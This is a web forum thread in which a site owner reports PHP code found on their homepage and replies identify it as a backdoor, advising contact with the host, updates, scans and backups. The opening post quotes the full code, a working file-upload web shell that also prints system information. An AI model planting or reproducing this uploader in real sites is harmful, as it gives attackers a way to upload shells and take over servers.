today i found a wired php code on my homepage the code as the following <?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Uploaded Successfully</b><br><br>'; } else { echo '<b>Upload Failed! </b><br><br>'; } } ?> Code (markup): i don't know what i should do? i have removed the code and is there anything else i should do?
Update your site to latest version if you are using any script, i would suggest as well to ask your provider to scan you site.
this code was just printed as a clean code it didn't show any upload form maybe the hacker injected that code to the page but it didn't show any form to upload files anyawy i will check with my host about it..
Yip, you've definitely had a hacking attempt. http://www.devnetwork.net/viewtopic.php?f=34&t=132136 I think from further reading, it enables the hacker to upload a shell file directly to the server which obviously would have severe consequences if the server is not adequately secured. I'd strongly urge you to contact your host and alert them to this attempt.
I don't think it was a virus, it was more a backdoor for the hacker to upload a shell file to the root of the server which wouldn't necessarily be picked up by an AV scan.
i'm new to server administration , is there a quick think i can do to check if the hacker shell file to the root of my server
I think your best bet is to contact whoever you rent it off and ask them what your next steps should be. Do you back your server up regularly? If so, make sure you take a local copy of the last backup before that hacking attempt just in case.